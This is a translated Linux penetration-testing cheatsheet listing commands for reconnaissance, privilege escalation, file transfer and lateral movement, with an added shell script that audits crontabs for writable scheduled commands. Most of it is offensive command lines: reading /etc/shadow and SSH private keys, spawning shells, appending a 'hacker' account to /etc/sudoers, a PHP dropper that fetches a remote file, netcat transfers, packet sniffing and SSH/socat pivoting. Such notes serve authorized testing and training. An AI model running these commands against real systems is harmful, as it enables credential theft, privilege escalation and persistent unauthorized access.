0x00 Preface
This article is a translation: it records Linux commands that are used frequently during penetration tests.
Original article: https://m0chan.github.io/2018/07/31/Linux-Notes-And-Cheatsheet.html
0x01 Enumeration
1.1 Basic commands
whoami
hostname
uname -a
cat /etc/passwd
cat /etc/shadow
groups
ifconfig
netstat -an
ps aux | grep root
uname -a
env
id
cat /proc/version
cat /etc/issue
cat /etc/passwd
cat /etc/group
cat /etc/shadow
cat /etc/hosts
1.2 Reconnaissance
# Quietly (SYN) scan the system's open ports
nmap -sS INSERTIPADDRESS
nmap INSERTIPADDRESS -p-
nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333
nmap INSERTIPADDRESS -sU
nc -u INSERTIPADDRESS 48772
1.3 UDP scan
./udpprotocolscanner <ip>
1.4 FTP enumeration
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
1.5 Start a web server
# Python 2 module; on Python 3 the equivalent is: python3 -m http.server 80
python -m SimpleHTTPServer 80
0x02 Exploitation
libSSH authentication bypass - CVE-2018-10933
https://github.com/blacknbunny/libSSH-Authentication-Bypass
Use nc <ip> 22 to banner-grab the SSH service; if it is running a vulnerable version of libSSH, then you can bypass authentication.
0x03 Privilege escalation
3.1 Basic commands
cat /proc/version   # <- check for kernel exploits
ps auxww
ps -ef
lsof -i
netstat -laputen
arp -e
route
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
cat /etc/issue
cat /etc/*-release
cat /proc/version
uname -a
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
lsb_release -a
3.2 Run pspy64
# https://github.com/DominicBreuker/pspy
# Run it in the background and watch for any processes being started
3.3 Spawn a TTY
# https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
awk 'BEGIN {system("/bin/sh")}'
find / -name blahblah -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
# from a python shell:
exit_code = os.system('/bin/sh')
output = os.popen('/bin/sh').read()
perl -e 'exec "/bin/sh";'
# from a perl shell:  exec "/bin/sh";
# from a ruby shell:  exec "/bin/sh"
# from a lua shell:   os.execute('/bin/sh')
# from irb:  irb(main:001:0> exec "/bin/sh"
# Can also use socat
3.4 Enumeration scripts
cd /EscalationServer/
chmod u+x linux_enum.sh
chmod 700 linuxenum.py
./linux_enum.sh
python linuxenum.py
3.5 Add a user to sudoers
echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
3.6 List cron jobs
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
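The cron listing above and the world-writable search in 3.8 matter together: a scheduled script that someone other than its owner can edit runs their changes as the cron user. As an added audit example (not part of the original cheatsheet), the POSIX shell function below parses a system-format crontab and reports entries whose command file is group- or world-writable. It assumes GNU coreutils (stat -c) and builds a constructed sample crontab in a temporary directory; the hypothetical names audit_crontab and build_sample are mine.

```shell
#!/bin/sh
# Audit a system-format crontab (/etc/crontab, /etc/cron.d/*: the sixth
# field is the user) for scheduled commands whose executable is writable by
# group or others. Each hit should get "chmod go-w". Assumes GNU coreutils.
# Prints one "<user> <path> <octal mode>" line per hit; always returns 0.
audit_crontab() {
    file="$1"
    set -f                              # no globbing: cron fields contain '*'
    while read -r line; do
        set -- $line                    # split the entry into whitespace fields
        [ $# -gt 0 ] || continue
        case "$1" in
            \#*|*=*) continue ;;        # comment or SHELL=/PATH= assignment
            @*) user="$2"; cmd="$3" ;;  # @reboot/@daily form: user is field 2
            *)  user="$6"; cmd="$7" ;;  # min hour dom mon dow user command
        esac
        case "$cmd" in /*) ;; *) continue ;; esac   # only absolute paths are checked
        [ -f "$cmd" ] || continue
        mode=$(stat -c '%a' "$cmd") || continue
        g=$(( (mode / 10) % 10 )); o=$(( mode % 10 ))   # group and other octal digits
        if [ $(( g & 2 )) -ne 0 ] || [ $(( o & 2 )) -ne 0 ]; then
            printf '%s %s %s\n' "$user" "$cmd" "$mode"
        fi
    done < "$file"
    set +f
    return 0
}

# Constructed sample (not real system data): one 755 script, one 777 script,
# and a crontab that schedules them. Prints the crontab path.
build_sample() {
    dir="$1"
    printf '#!/bin/sh\necho backup\n' > "$dir/safe.sh";  chmod 755 "$dir/safe.sh"
    printf '#!/bin/sh\necho backup\n' > "$dir/loose.sh"; chmod 777 "$dir/loose.sh"
    cat > "$dir/crontab" <<EOF
# constructed sample crontab
SHELL=/bin/sh
PATH=/usr/bin:/bin
*/5 * * * * root $dir/safe.sh
0 2 * * * backup $dir/loose.sh --full
@reboot root $dir/loose.sh
0 3 * * * root logrotate /etc/logrotate.conf
EOF
    echo "$dir/crontab"
}

dir=$(mktemp -d)
audit_crontab "$(build_sample "$dir")"   # reports only the two loose.sh entries
rm -rf "$dir"
```

Run it against /etc/crontab or a file from /etc/cron.d on a host you administer; per-user crontabs (crontab -l) have no user field and are not handled by this parser.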
3.7 Check for readable SSH keys (persistence and escalation)
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
3.8 Startup scripts
find / -perm -o+w -type f 2>/dev/null | grep -v '/proc\|/dev'
3.9 Find files writable by the user or group
find / -perm /u=w -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -type f -user `whoami` 2>/dev/null
find / -perm /u+w -user `whoami` 2>/dev/null
3.10 Find directories writable by the user or group
find / -perm /u=w -type d -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -type d -user `whoami` 2>/dev/null
3.11 Sniff traffic
tcpdump -i eth0 <protocol>
tcpdump -i any -s0 -w capture.pcap
tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
3.12 User-installed software (sometimes misconfigured)
/usr/local/
/usr/local/src
/usr/local/bin
/opt/
/home
/var/
/usr/src/
0x04 Exploit
4.1 Get file capabilities
/sbin/getcap -r / 2>/dev/null
4.2 Find SUID binaries
find / -perm -u=s -type f 2>/dev/null
4.3 Check the sudo configuration
0x05 File transfer
5.1 base64
cat file.transfer | base64 -w 0
echo base64blob | base64 -d > file.transfer
5.2 curl
curl http://webserver/file.txt > output.txt
5.3 wget
# wget saves to the remote file name unless -O names the output file
wget http://webserver/file.txt -O output.txt
5.4 FTP
pip install pyftpdlib
python -m pyftpdlib -p 21 -w
5.5 TFTP
service atftpd start
atftpd --daemon --port 69 /tftp
/etc/init.d/atftpd restart
auxiliary/server/tftp   # Metasploit auxiliary module
5.6 nc listeners
nc -lvnp 443 < filetotransfer.txt
nc <ip> 443 > filetransfer.txt
5.7 PHP file transfers
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
5.8 SCP
# Copy a file:
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext
# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination
0x06 Lateral movement
6.1 SSH local port forwarding
ssh <user>@<target> -L 127.0.0.1:8888:<targetip>:<targetport>
6.2 SSH dynamic port forwarding
ssh -D <localport> user@host
nano /etc/proxychains.conf
# proxy entry to add under [ProxyList] in proxychains.conf:
socks4 127.0.0.1 <localport>
6.3 socat port forwarding
./socat tcp-listen:5000,reuseaddr,fork tcp:<target ip>:5001